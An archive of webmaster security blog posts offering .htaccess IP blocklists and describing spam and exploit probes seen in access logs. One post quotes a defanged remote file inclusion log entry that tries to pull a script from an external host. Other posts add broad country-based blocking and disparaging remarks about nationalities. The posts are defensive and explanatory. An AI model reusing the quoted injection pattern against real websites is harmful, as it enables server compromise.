Many of my regular visitors are aware that I maintain and publish various IP address blocklists, used to protect websites and web servers from nefarious activities by scammers, spammers and exploiters. Today, my website came under attack from a Russian Server, located in Saint Petersburg, Russia. The attacks were server exploit attempts, using various Query strings and http redirects. All were blocked by my security measures, but there were so many attempts in a short period of time that I feel that I should spread the word to other webmasters, before it is too late.

First off, server exploit attempts are nothing new. They happen every day and are easily seen if you read your website's raw access logs or stats. Most exploit attempts are fast in/out probes, usually coming from rotating IP addresses, and only a few at a time. But, the attack I logged this morning was different than the usual model. In a 26 minute period I received 69 exploit probes from the same IP address. I ran a Whois lookup on the IP 77.221.130.5 and found that is it assigned to Server 005 on infobox.ru, in Saint Petersburg, Russia. This is a virtual hosting and colocation data center, who's assigned address range is from 77.221.128.0 - 77.221.143.255, which is designated by the network CIDR: 77.221.128.0/19.

Security-minded webmasters are interested in blocking offending IP addresses and the CIDRs that encompass exploited servers. Most folks running websites are hosted on Apache web servers and are using shared hosting accounts, where they can only use .htaccess file "directives" to block unwanted Internet traffic. Some web hosts may allow only "Mod_Access" directives in user defined .htaccess files. Here is a Mod_Access rule you can add to your .htaccess file to block the offending Russian data center mentioned above:

<Files *>
order deny,allow
deny from 77.221.128.0/19
</Files>

In the above .htaccess directive all IP addresses are permitted access to all files (Files *), except for those IPs included within the CIDR 77.221.128.0/19. This is due to the "order" statement (order deny,allow), where deny is processed before allow. Anything defined in "deny from" rules is processed first. Anything not specifically denied is allowed by default.

I mentioned in the opening paragraph that I publish various IP blocklists (a.k.a. Blacklists). The list that blocks the source of this exploit is called the Russian Blocklist, which includes numerous IP address ranges in Russia, The Ukraine, Turkey and several other former Soviet Union countries. These lists are available in two formats each. The most commonly used format is my .htaccess blocklists and the lesser used type is my iptables blocklists.

Currently, there are four separate blocklists per format. They are the "Chinese" (and Indo-China), "Exploited Servers" (+ proxies), "Nigerian" (and African) and "Russian" (+ Turkey and former Soviet Union) Blocklists. If you use a shared web hosting account you will only be able to use the .htacccess format. If you have a VPS or fully dedicated server you can probably use the iptables blocklists, which require "root" access to the OS. The iptables blocklists deny all access to a server and all of its modules, including email and ftp servers. A .htaccess blocklist can only deny access to http and https traffic. Either type will block the exploit probes listed in my extended comments. The landing pages explain how to use the directives contained in each blocklist.

All of my blocklists are currently free for the taking, but I do appreciate donations if you benefit from my work. You will find PayPal Donate buttons on each blocklist page.

Continue reading "Russian Server sending exploit codes. Block 77.221.128.0/19 now!" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

February 1, 2009

Block server script injection exploits targeting your websites

Server exploits abound!

Enough is enough already! It's bad enough that I have to fend off the occasional exploit attempt against my main website, but 24 in one day, from the same IP address is something I can't ignore, and neither should anybody else who maintains a website. That IP address is 212.241.182.240, which is a dedicated server that belongs to Pipex Dedicated Hosting (and associates), in Great Britain (See Whois report). This is an exploited server and it is hostile to other servers and websites!

Here is a sample of just one of the many attacks launched by this server, against mine (I deactivated the hyperlink to the hostile script, substituting an * for a t):

212.241.182.240 - - [01/Feb/2009:02:44:23 -0800] "GET /?sIncPath=ht*p://kadin.or.id/mail/id1.txt?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

What's this all about, you ask? It's about somebody who is leasing a dedicated server and either knowingly or unknowingly using it to blast out hostile exploitation scripts against other servers. This exploit is trying to upload a file named id1.txt into my website, via some vulnerability in a script that might be running on it (didn't happen - see the 403 response). Normally I wouldn't even assume that the people leasing the server had any knowledge of such goings on, but this time something is different. In just about every other instance of script injection attempts, when I trace the IP to a server and try to access it, I usually see one of the following responses:

  1. A website's home page (index.html, index.php, etc.)
  2. A "Welcome to Apache" screen, for a new website on an Apache server
  3. A Welcome to cPanel or WHM screen
  4. A welcome screen for an unconfigured website hosted on a Windows IIS server
  5. A 403 Forbidden message (someone doesn't want me poking around)
  6. A message that no website has yet been configured on the server

Today, when I went to investigate the IP address that was spewing out 24 exploit attempts in one day, instead of one of the above listed typical responses, all I saw was a login field, requesting a user name and password. This is a password protected website and it is being used to exploit other websites and web servers. Nobody can access any of it's pages, or inject hostile scripts into it without logging in with the correct credentials. Maybe this server used a weak password and user name combination that was cracked with a dictionary or rainbow attack, or maybe the administrator was tricked into allowing a keylogger to infect his or her personal computer (used to login to his/her website), or maybe the owner is knowingly using this server to launch exploit attacks against other servers, like mine.

Whatever the case may be, this server is out to get us and if you run a website you may want to block it for your website's protection. I will give you several methods of denying access to this server and others launching similar exploits, in my extended comments.

Continue reading "Block server script injection exploits targeting your websites" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

November 8, 2008

.htaccess blocklist addition for prolific access log spammer

Today I reviewed my daily access log for this website, and I discovered a large number of repeated attempts to spam my access log, all coming from the IP address: 64.182.124.212. The spam attempt was referrer field entries for a medial search engine and a social networking and dating website.

The IP address 64.182.124.212 belongs to a web hosting company known as CI Host, and is assigned to hosting customer PacificAir.com, an amateur looking website. The spamvertised websites in the referrer field look just as amateur as the PacificAir website and are hosted on the same server. The IP range assigned to CI Host is 64.182.0.0 through 64.182.255.255, or in CIDR notation: 64.182.0.0/16.

The way I respond to attempts to spam my access logs is that I place the offending IP address, and/or CIDR of their hosting company, on my published IP blocklists. I did just that, placing the CIDR 64.182.0.0/16 on my Exploited Servers Blocklist. If you are getting spammed from the IP address 64.182.124.212 and want to block them in your .htaccess file, on your Apache Hhosted website, just add one of the following rules to a section labeled <Files *>:

<Files *>
order deny,allow
deny from 64.182.124.212
</Files>

If, like me, you decide to block the entire ISP/web hosting company, use this rule:

<Files *>
order deny,allow
deny from 64.182.0.0/16
</Files>

NOTE:
If you have your website hosted by CI Host please read the warning in my extended comments!

Continue reading ".htaccess blocklist addition for prolific access log spammer" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

July 7, 2008

Stupid Russian Blog Spammers Still Wasting Their Time

"Stupid Russian Blog Spammers Still Wasting Their Time" makes for a catchy, surreal title, but it's true. The same country that produced the brilliant criminal masterminds behind the Storm and Grisbi Worms has also produced some of the stupidest blog spammers to ever set finger to keyboard!

Let me explain what I am referring to regarding stupid blog spammers. First of all, look up in the upper right corner of this blog, just under the Google search field. Here's what it says in capital letters: "SORRY: NO COMMENTS, NO TRACKBACKS!" That should be self explanatory to almost anybody who can read English words, including people intent on spamming a blog such as this one, using English words. You know the crap I'm talking about; links to buy unlicensed or illegal drugs or herbal solutions, to cure "ED" or enlarge one's "natural size." When I first started this blog I did allow trackbacks and comments and that is what I was getting submitted, all in English and all traced to Russian and Ukrainian IP addresses.

As soon as I realized that only blog spammers were trying to comment on my blog I decided to disable the codes and modules that allowed comments and trackbacks. Still, these idiots in Russia and the Ukraine continued trying to POST comments and trackbacks to the now disabled modules that used to handle those functions. This led me to write three articles about these incidents, during the spring and summer of 2007. Their names and links to them are as follows:


  1. Stupid Blog Trackback Spammers Don't Understand Server 403 Responses

  2. Russian and Ukrainian Blog Spammers are STUPID!

  3. Blog spammers still wasting their time tying to spam this unspammable blog


I wrote those articles about a year ago, yet, I still see daily access log entries being blocked with server 403 responses, belonging to Russian IP addresses trying to POST spam comments or Trackbacks to this blog. It is obvious that these spammers are using scripts, but, being stupid spammers they don't bother to verify if those scripts are being allowed to complete their submissions, or check my blog to see if their comments were even posted. I'll bet somebody is paying these idiots to send blog spam for them and they are ripping off the guys with the money. If my blog is any indication of their lack of any level of intelligence, then I am guessing that they are having a similar lack of success trying to spam your blogs. Still, some of their attempts may work on unsecured servers.

Anyway, insults to the enemy aside (it feels good though!), I never see the comments they are typing, just an access log entry containing a 403 Forbidden, or 302 redirect back to their own websites (lol). My Apache-based, shared-hosting web server is protected with a custom ".htaccess" file that contains my entire, now-famous, "Russian Blocklist!" Many webmasters are using this blocklist to keep Russian and Turkish spammers and hackers from accessing their web sites.

If your web site and blog is hosted on a shared Apache/Linux based web server and you want to block access to IP addresses in the former Soviet Union and Turkey, just download my Russian .Htaccess Blocklist and either use it as your new .htaccess file, or merge the "deny from" list into your existing .htaccess. Full instructions are included on my .htaccess blocklists landing page and on each blocklist page. The landing page has links to all of my existing .htaccess IP blocklists (Chinese, Nigerian, Russian and Exploited Servers), as well as my iptables Linux firewall blocklist equivalents.

An actual access log entry and codes you can use to block web site access to these people, are in my extended content.

Continue reading "Stupid Russian Blog Spammers Still Wasting Their Time" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

May 22, 2008

Steel Guitar Forum Goes Offline Temporarily

Steel Guitar Forum goes offline.

On May 19, 2008, the external RAID hard disk drive unit powering the popular website - The Steel Guitar Forum (SGF) - suffered a catastrophic failure, taking the entire website offline. It remains offline as of May 22, 2008, while a new RAID setup is being installed and data recovery attempted. We are hoping to have the server back online as soon as possible, with as little data loss as possible. As many of you already know I do security for the SGF and act as moderator of the "Computers" section of the forum. I have assisted the owner/Administrator, Bobby Lee Quasar, in procuring a suitable replacement.

The Steel Guitar Forum is a (paid) members only community consisting of over 4000 professional and amateur pedal and non-pedal steel guitarists, located around the World. Most of the World's top steel players are members of this community, where information, techniques and music business discussions take place on a daily basis, as well as the exchange of equipment. For many of these members this website is their primary destination on the Internet and I know that they are missing it's presence during this outage. We are doing everything we can to get the SGF back online. In the meantime I recommend that all affected steel guitarists spend some extra time practicing their instruments!

The SGF is back online, as of the afternoon of May 23.
As it turned out both Western Digital hard disks in the WD MyBook Pro Edition II, external RAID enclosure failed at the same time!

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

March 24, 2008

Russian connection to user agent "WordPress/2.1.1" in website access logs

I read the access logs for my website every day and sometimes I see something that jumps out and grabs my attention, as not right. This month, that something is a bunch of attempts to grab various pages on my blog, in an unusual manner, with a very unusual user agent: WordPress/2.1.1

At first I thought that somebody is just trying to pick up my MovableType RSS feed, but that is not what they are after. So, I did a little research on "WordPress/2.1.1" and learned that it represents a hacker compromised version of the popular WordPress PHP blogging software, which was updated months ago, to version 2.1.2, by Wordpress.org. I suppose that there may be some Wordpress users who haven't heard that this version was hacked with a backdoor, and haven't bothered to check for updates, but the log entries I am seeing are not from a Wordpress blog. I decided to do a little investigating, which is something I am good at. So, I followed the IP addresses to see from whence they came.

What I have learned so far, regarding the visitors who have configured their browser with the user agent "WordPress/2.1.1" is that, (A) - they come at me with no "Referer" field entry, (B) - they always try to GET a blog article itself, followed immediately with a request for the HEAD, and (C) - they change IP addresses after getting my 403 (Forbidden) message and try again. This cloaking of IP addresses has no effect, since I am also blocking them by their User Agent string.

Let's take a look at the access log entries for this user agent (stretch out or maximize your browser):

67.228.198.50 - - [02/Mar/2008:00:58:01 -0700] "GET /blogs/2008/02/my_spam_analysis_for_february_18_24_2008.html HTTP/1.1" 403 350 "-" "WordPress/2.1.1"
67.228.198.50 - - [02/Mar/2008:01:04:52 -0700] "HEAD /blogs/2008/02/my_spam_analysis_for_february_11_17_2008.html HTTP/1.1" 403 238 "-" "WordPress/2.1.1"

69.50.177.18 - - [13/Mar/2008:12:06:49 -0600] "GET /blogs/2008/03/2wire_modem_dns_poisoning_attack_returns_to.html HTTP/1.1" 403 351 "-" "WordPress/2.1.1"
69.50.177.18 - - [13/Mar/2008:12:07:14 -0600] "HEAD /blogs/2008/03/2wire_modem_dns_poisoning_attack_returns_to.html HTTP/1.1" 403 238 "-" "WordPress/2.1.1"

83.222.14.129 - - [23/Mar/2008:16:52:57 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
83.222.14.129 - - [23/Mar/2008:16:52:57 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"

89.108.85.75 - - [23/Mar/2008:16:52:38 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
89.108.85.75 - - [23/Mar/2008:16:53:08 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"

91.192.116.2 - - [23/Mar/2008:18:56:59 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
91.192.116.2 - - [23/Mar/2008:18:57:14 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"

216.255.185.178 - - [24/Mar/2008:10:15:07 -0600] "GET /blogs/2008/03/followup_article_about_windows_vista_sp1_rel.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1
216.255.185.178 - - [24/Mar/2008:10:15:22 -0600] "HEAD /blogs/2008/03/followup_article_about_windows_vista_sp1_rel.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1

These are definitely not typical access log entries and nothing a normal search engine or human visitor would do. Wordpress is a software blog application that gets installed onto web servers. It is not a browser. User agents are words that identify a browser, or a search engine, or robot. Despite the diversity of IP addresses, these visits are not unrelated. Read my extended comments to see where these IP addresses are allocated and my conclusions about their source and probable intent.

Continue reading "Russian connection to user agent "WordPress/2.1.1" in website access logs" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

January 28, 2008

Russian & Exploited Servers Blocklist is now two blocklists

Prelude:
For the last couple of years I have been compiling and publishing lists of IP addresses belonging to ISP's and commercially hosted web servers in various parts of the World, from which unwanted spam, scams and server hacking attempts emanate. These lists are compiled in a format that is recognized by Apache Web Servers, using - <Files *> deny from - IP address directives (rules). They include both individual IP addresses and ranges of IP's, belonging to web hosts, server farms and ISP's, known as a CIDR. When a group of these blocked IP addresses and CIDR's are compiled into groups they become a "blocklist," sometimes mislabeled as "blacklist."

My blocklists can be used in at least two different Apache Server configuration files; "httpd.conf" (requires server root access like on dedicated servers) and ".htaccess" (used on shared hosting accounts). My blocklists are all used in private .htaccess files that go into the web root (e.g public_html), or individual folders, on an Apache hosted web site. If your web host allows .htaccess overrides on individual websites you can use any of my blocklists. Instructions are found on each page, in comments like this:

# Here is a sample comment as used in a .htaccess file.
# The # sign causes Apache to ignore the rest of this line

The Changes:
I can see from reading my Change Detection reports that a lot of webmasters are using my .htaccess blocklists. Those of you who are using my Russia and Exploited Servers Blocklist need to be aware that it has just been split into two new files. One deals just with ISP's and servers located in the former Soviet Union and Turkey, while the other deals with exploited servers owned by various web hosts and co-location server farms and data centers, in various countries (especially here in the good old USA!). The descriptions of these two blocklists are as follows...

The New Files:
The new Russian Blocklist is now located at www.wizcrafts.net/russian-blocklist.html and it contains IP addresses and CIDR's traced to Russia, The Ukraine, Bulgaria, Romania, Estonia, Latvia, Estonia and Turkey. I included Turkey in this blocklist because I get tons of spam coming through various ISP's in that country (e.g. Turk Telecom), plus numerous server redirection exploit attempts. Basically, the Russian Blocklist is comprised of ISP's, with some web hosting companies thrown if, which are located in Russia or these other Eastern Bloc countries. Most of the traffic I see from these folks are blog, access log and email spam, with the occasional server exploit attempt against my website. New IP addresses and CIDR's are added to this blocklist as I analyze spam sources, or trace log/blog spam attempts (all unsuccessful due to my security measures and filters) to countries covered by this file.

The new Exploited Servers Blocklist is located at www.wizcrafts.net/exploited-servers-blocklist.html
and contains long "deny from" lists of various types of web hosting and dedicated server companies, that are, have, or might try to run hostile codes against my web site, or spam my access logs, or bypass my security measures, or try to steal my traffic via proxy services. All of these things are hostile actions and are conducted by criminals and criminal organizations. This blocklist is growing rapidly as I see and trace exploits attempts against my server.

Conclusion:
If you have been using my previous file - russia+exploited-server-blocklist.html - please change your bookmarks to point to one, or both of the new files that have replaced it. Here is a list of my current .htaccess blocklists, as of this posting:

Exploited Servers Blocklist | Russian Blocklist | Nigerian Blocklist | Chinese-Korean Blocklist

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

August 29, 2007

Blog spammers still wasting their time tying to spam this unspammable blog

Sometimes people who you'd think know what they're doing are just so completely clueless that it makes me laugh! I am referring to Blog spammers; the guys in Russia, The Ukraine, Estonia and other parts of the former Soviet Union, who relentlessly pound away at their keyboards, sending comment and trackback spam messages to every MovableType blog they can locate. They must assume that most of these blogs accept these comments and blindly publish them, because they keep trying to post spam messages to MT blogs, linking back to their spamvertised websites hawking various drugs, or pornography.

Well, I for one don't allow any comments or trackbacks on my blog. It says so in plain, bold English and Russian words, at the top-right of every blog page, and in all of my blog search results pages. Look under the Google Search box, at the top right of this page, and you'll plainly see where it says:

SORRY: NO COMMENTS, NO TRACKBACKS
КОММЕНТАРИИ и TRACKBACKS ВЫКЛЮЧЕНЫ и НЕ ИЗДАНЫ!

Now, if I was wanting to spam this blog and I read that, I'd move along to an easier target and not waste my time on this one. Yet, when I read my server access logs I see that somebody keeps trying to post comments and trackbacks to specific articles in my archives (all of which get a server 403 response), then tries to search for them on the pages to which they were targeted. However, since I don't want any comments or trackbacks I have deleted the Perl files that handle them and disabled those functions in my global settings. Heck, I have even stripped out all the codes referring to trackbacks from my page templates. Even I can't post a trackback on this blog!

Since these spam comments never reach my blog, when the idiots who try to post them search for them on the target pages, nothing is found matching those spam terms. Boris the Spammer needs to get a life or find less secure targets to pester. Instead, he plugs away fruitlessly on this blog, filling my access logs with all kinds of new IP addresses for me to add to my ever-growing Russian Blocklist.

Countless webmasters are using my Russia+Exploited Servers Blocklist. Most of the IP addresses in the Russian blocklist are gathered from my own raw access logs, from stupid blog spammers who evidently can't read the English or Russian notice that I don't allow comments or trackbacks.

If you have a blog or forum that is getting scammed by Nigerians, or spammed by Russians, one or more of my .htaccess blocklists may help you get rid of these leeches. Note that they only work on Apache web servers, unless your Windows server has an isapi rewrite module installed by the company leasing the server space to you. You can use my Webmaster Contact page to hire me as a consultant to help keep scammers and spammers off your website.

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

August 4, 2007

Stupid Blog Trackback Spammers Don't Understand Server 403 Responses

The title of this article tells it all: "Stupid Blog Spammers Don't Understand Server 403 Responses!" Many months ago I discovered that although comments and trackbacks were not being posted to my blog, due to automatic moderation and classification of them as spam, nonetheless they kept on a-comin'. The comments spammers gave up a couple of months ago when they searched my blog only to learn that their bullshit comments had not been posted and never would be (I told them so on the search results page). However, the idiots who are trying to post trackback spam messages don't bother to search the blogs they are posting to, nor do they apparently read the responses sent by the script they are aimed at. If they did all they would see from my blog is a steady stream of server 403 responses; "Access Denied!" I don't even have the comments or trackbacks Perl modules installed anymore, so even I can't post comments or trackbacks to my own blog! I removed them when it became obvious that only spammers were commenting or tracking back.

If you run a MovableType blog and don't care to allow comments or trackbacks, yet you are seeing numerous attempts to spam your blog (in the list of junk comments and trackbacks), you can do what I did and disable them altogether, then delete or rename the files used to post these comments. To disable them in MovableType, log into your MT installation, then click on the left sidebar item "Settings" then click on the "New Entry Defaults" tab, then under "Default settings for new entries" uncheck both "Accept Comments" and "Accept Trackbacks," then scroll down to the bottom of the page and click on the "Save Changes" button. This will remove the Comments and Trackbacks links under all of your posts. You may still have to manually remove existing comments and trackbacks from old topics, or delete the old topics entirely if they have a lot of useless commenting in them.

Despite the fact that you have disabled accepting comments the spammers may still try to go straight to your Perl scripts that handle comments and trackbacks, bypassing the choices you made to exclude them. To prevent this you can either remove or rename these two files that are in the standard MT installation, under the CGI folder/MT (typically cgi-bin/MT/):
mt-comments.cgi
mt-tb.cgi

Without those files nobody is going to Post a spam comment to your blog and you can never accidentally re-enable comments or trackbacks unless you upgrade, or replace those files.

As I said in the beginning these spammers are not reading the results of their attempted trackback messages (success or failure), thus they are probably using automated scripts to send them out blindly from a spam list supplied to them by somebody even dumber than they are, without any concern about success or failure of their efforts. If you run your blog on an Apache hosted web server and want to deny access to these assholes read the technical details in my extended comments.

Continue reading "Stupid Blog Trackback Spammers Don't Understand Server 403 Responses" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

August 3, 2007

Block spammers, scammers and hackers with our .htaccess blocklists

There are millions of websites that host blogs and/or forums and many of them are targeted by scammers, spammers and hackers. Webmasters everywhere are searching for solutions to these problem-causing individuals and scripts. Some of you already know that I can help you block this unwanted traffic from your websites, but a great many more may just be discovering this fact. If your website, or blog, or forum is hosted on an Apache web server, and your hosting allows personal .htaccess overrides, read on.

For those who don't know what .htaccess is, it is an access control file used on Apache servers, on a per-website basis, to define who may or may not access all or parts of a website, and to rewrite requests for certain files, or folders, or URLs to other files, folders, or URLs. You will notice that the file name has no prefix ; just a period followed by htaccess. This makes it a normally hidden-system file on the Apache hosted web server. Hidden Apache files can be revealed by using a special FTP command: -al or a website control panel function on the file manager page, to display these hidden files for downloading or editing (show hidden files, etc). Your website may or may not already have a .htaccess file. If you upload with an FTP tool use the "remote file mask" -AL ( or -al) and refresh the remote view to see if .htaccess exists in your home, or public_html or / directory (more info in the extended comments). Otherwise, look at your website's file manager, or ftp tools in your Cpanel, or other website control panel. There should be some option to reveal hidden files beginning with a period.

If you do not use an FTP Client to upload files, but are using a web-based control panel, it is entirely up to your web host as to whether or not you can view, alter, or upload .htaccess files.

Important Notice! Be careful when creating, editing, or pasting codes into a .htaccess file, because if you type an invalid term, directive, or character, or add an unescaped space in a regular expression, you may cause a Server 500 error to occur, locking everybody out of the website, except via FTP access (with login credentials).

The blocklists that I am about to tell you about use the Apache Module mod_access which is almost always available in Linux based shared, vps, semi-dedicated, or dedicated hosting. Unfortunately, if your website is hosted on a Windows Server you are out of luck, unless your host has installed, or is willing to install the ISAPI_Rewrite module for you.

Assuming that your website is hosted on a Linux box running an Apache web server, and you are allowed to use a personal .htaccess file with mod_access - IP "deny from" directives, the following web pages may be of great help to you in blocking access from unwanted countries, ISPs or hostile servers that are trying to spam or exploit your server (or website).

First on the list is my first work in the field of blocking scammers from forums and auction sites; my Nigerian Blocklist. I have been and still am compiling this list of IP addresses assigned to Nigeria and most of it's neighboring countries in Africa, from which Nigerian scammers and other African fraudsters have operated against forums and auction sites around the (non-African) World. It is extremely effective at denying access to anybody trying to access your website from within Nigeria or other African countries, including via satellite Internet services. If you have a blog, auction site, or forum that is plagued by Nigerian scammers - try embedding my .htaccess directives into your .htaccess file, or create one by copying and pasting the contents of the one on my Nigerian Blocklist web page into a new plain text file (Notepad) and save it as .htaccess. If your computer's operating system won't allow you to save it without a file prefix, choose htaccess.txt then upload it to your server and rename it there to .htaccess . You will see an instant drop in the number of Nigerian scammers on your website.

The second blocklist deals with unwanted traffic coming from ISPs and servers within China, Korea and surrounding countries. This is my Chinese Blocklist. All of the same methods listed above apply to this mod_access deny from list. It can be copied and pasted into your .htaccess file just like the Nigerian list details show, or it can be added to that list by merging the two groups inside just one set of <Files *> directives. Note that if you do business with anybody in China, Korea or neighboring countries, they will not be able to access your website unless you "poke a hole" in the list to allow their IP address(s) in.

Lastly, I present for your viewing pleasure, the Russia and Exploited Servers Blocklist. This list is growing faster than the other two because I am getting hit constantly by so many Russian based blog and log spammers and server exploit attempts, from both shared and dedicated servers around the World. This blocklist contains a large number of IP addresses and CIDRs (basically means IP ranges) from Russia, The Ukraine and other former Soviet Bloc Countries, Turkey, Algeria, and from a huge number of exploited web servers, co-location server farms, and hosting companies around the World. Servers should not be trying to contact other servers, unless they have a relationship with each other. These servers want to hack or spam your server or websites and should be blocked.

All of these blocklists are still being added to or modified as new information is discovered about the sources of scams, spamming or hacking attempts from exploited servers. Each page has a button (under the bold last-modified date, before the directives) for you to use to sign up for alerts from the ChangeDetection bot, which will email a notice to you once a day, only on days that I have modified the blocklist you are monitoring. This is a free service that I use myself. Next to that button you will see a PayPal Donate button that I have placed there, where people who benefit from my voluntary work can show some financial appreciation. Any amount will be gladly accepted, with a $10 minimum please.

There are links to contact me for assistance or to provide input, on all of the blocklists, in the footer area.

Continue reading "Block spammers, scammers and hackers with our .htaccess blocklists" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

June 20, 2007

Steel Guitar Forum Server Offline Due To Cut T1 Cable

I am a member of and Moderator of the computers section of the Steel Guitar Forum, which has been offline since the morning of June 19 (2007). In an email exchange with the owner - b0b Lee - it was revealed that workers on the street outside of the server's location have accidentally cut his T1 line. AT&T will be repairing the line as soon as possible. SGF members may wish to use this time to practice their steel guitars, until the forum is back online.

The Steel Guitar Forum is a multi-section discussion forum for members only, most of whom are either amateur or professional pedal steel guitarists. I have been a member for a number of years since I am also a professional pedal steel player. My section is the computers forum, of which I am the moderator and a strong contributer.

Anybody who plays any type of steel guitar (pedal, non-pedal, or lap steel), or a resophonic guitar is welcome to apply for membership at the SGF.

UPDATE: The SGF is now back online.

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

June 8, 2007

3500 FTP account passwords stolen from DreamHost database

DreamHost Status Blog Archive Security Breach

It seems that somebody has managed to hack into the customer database for FTP login passwords, at the DreamHost website hosting company. According to an email sent out to the affected Dreamhost customers, 3500 accounts seem to have been breached by a hacker, or hackers, using as yet unknown attack vectors.

According to the update posted by DreamHost, on June 7, this may be a combination of security breaches, including keyloggers that may have been installed onto the affected users' computers. That means that the same thing could affect users of other web hosting companies. So far the hack appears to be the addition of various iframe codes or links to porn sites, to all files containing the word "index" of the compromised accounts. The file extension does not matter; if you have a file containing the word "index" it will be a target of this hacker. This includes index files in sub-directories, or add-on domains hosted under the same master account. Therefore, all website owners are urged to download their index files and inspect them for unauthorized modifications. If you find any remove them and notify your hosting provider, and scan your own computers for spyware, keyloggers, or backdoor trojans.

In one blog post about this I read that at least one DreamHost customer had all of his "index" files overwritten completely with a page containing an iframe exploit, leading to a website that installs a Trojan Horse program.

There is a statement about this incident, from the DreamHost blog, in my extended comments...

If you are a DreamHost customer, and you have scanned your computer for security breaches and found none, and you were notified that your account was among those compromised, and you are looking for another web host, I use and recommend BlueHost Web Hosting. They offer huge amounts of disk space and data transfer, plus unlimited add-on domains, for those who need to host multiple domains at a low monthly rate. I have all of the details on my BlueHost page. I have been with them for over 6 months and have had very little downtime - well less than I used to experience with my previous web host. My server has not been hacked, altho I see people trying to do so every day or two (by reading my raw access and error logs).

I am available to assist people whose websites and/or computers have been compromised by hackers, spyware, keyloggers, or other security threats. Please visit my home page for more information and links to my webmaster services and contact pages.

Continue reading "3500 FTP account passwords stolen from DreamHost database" »

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

May 25, 2007

Dotster New Domain Registrations at Half Price, May 26 - 28, 2007

Attention website owners!

If you have been thinking about registering a few new domain names, but were waiting until the price was "right," your moment has just arrived! Dotster Domain Registrars just announced a half price sale on new domain registrations, this coming Memorial Day Weekend, from May 26, through 28, 2007. Domains regularly priced at $14.95 will only cost you $7.48 per year, using my coupon code below.

Note that this only applies to brand new domain names, not renewals or transfers.

Particulars

Dates - May 26th, 27th, 28th

Discounted Extensions - .com, .net, .org, .biz, .us

Coupon Code: MDAY50

Bonus coupon code offer

Dotster also provides all manner of web hosting packages, from low cost shared hosting to VPS semi-dedicated, at very reasonable prices.

5 Free Domains with Any Dotster Web Hosting Package! Enter Coupon Code "5FORFREE"

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

March 20, 2007

March Madness Sale on Domains at Dotster

March Madness Domain Sale at Dotster

Yee Haw! Domain Registrar - Dotster, Inc. has just announced a March Madness sale on new and transfered Domain registrations, from now until April 1, 2007. Dotster is allowing unlimited numbers of registrations and transfers at the low low rate of only $7.00 each, when you use coupon code MADNESS during checkout. The regular price for new domain registrations at Dotster is $14.95, per year, so you will save a whopping 53% off new registrations. Domain transfers are regularly $8.95, so you will save 22%, plus gain one extra year on the expiration date, per domain transferred.

If you want to have a web presence you will need to have a domain registered with a recognized Registrar. Dotster is a leading ICANN-accredited registrar capable of registering your .com, .net, .org, .cc, .tv, .ws, .info, and .biz top level domain (TLD) names.

If you would like to learn more about Dotster's services, read my Dotster information page. I have been a happy Dotster customer for 7 years and won't even consider another registrar. Most of my Webmaster clients are also registered at Dotster. Dotster also offers fast and affordable custom web design.

Facebook Twitter LinkedIn Pinterest Instapaper Google+ Addthis

back to top ^

March 7, 2007

Russian and Ukrainian Blog Spammers are STUPID!

< Begin Rant >
If you publish a blog (Weblog) using MovableType, I'm certain that you have learned that if you accept comments, or trackbacks, that you are going to attract blog spam (splog). I used to allow comments and trackbacks on my blog until I found that all of the comments and trackbacks were 100% spam, with links to sleazy websites. Being the curious, suspicious spam/scam hunter type person that I am, I began studying my raw access logs to see where this crap was coming from. I wasn't surprised when I discovered that most of the blog spam I was getting aimed at my blog was coming from a few IP addresses in the Ukraine and Russia. Normally I would consider Russians and Ukrainians to be educated, intelligent folks, but now I have to wonder if I was mistaken in that line of thought.

The reason I make such a harsh statement is because I have not allowed comments or trackbacks to be posted for a long time now (Turn Off Comments and Trackbacks), and when I did allow them I always moderated them and deleted spam comments; they were never posted. In an effort to curtail the continuing attempts to post spam to my blog I have even removed the files used to post comments and trackbacks to my MovableType blog. Still, every day, for hours at a time, idiots in Russia and the Ukraine keep trying to spam to my blog, despite the fact that I clearly state that no comments or trackbacks are accepted, and the files that are required for them are gone. Everytime these idiots Post a comment or trackback my server gives them a 403 Forbidden response, but they don't seem to care, or notice, or are too uneducated to understand that Access Denied means that their request failed to go through! So, growing tired of even giving them the courtesy of a 403 response I am now redirecting all of these bullshit attempts to Post comments or trackbacks right back to the sender's own browser or web appliance; to 127.0.0.1. That should result in a Page Cannot Be Displayed or Server Cannot Be Located message on the program the idiots are using to try to spam me.

The blog spammers are even resorting to using hijacked proxies, on computers in other countries, but they all get the same message, since I block all such exploits in my .htaccess file. I wasn't born yesterday. I know how to block IP addresses, proxies and unwanted behavior or exploits on my server. I also know how to track the source to their ISP and report them for spamming.

If you run MovableType blogs on an Apache Server, and are interested in seeing in my solution to the problem of blocking blog spammers, read my extended comments.

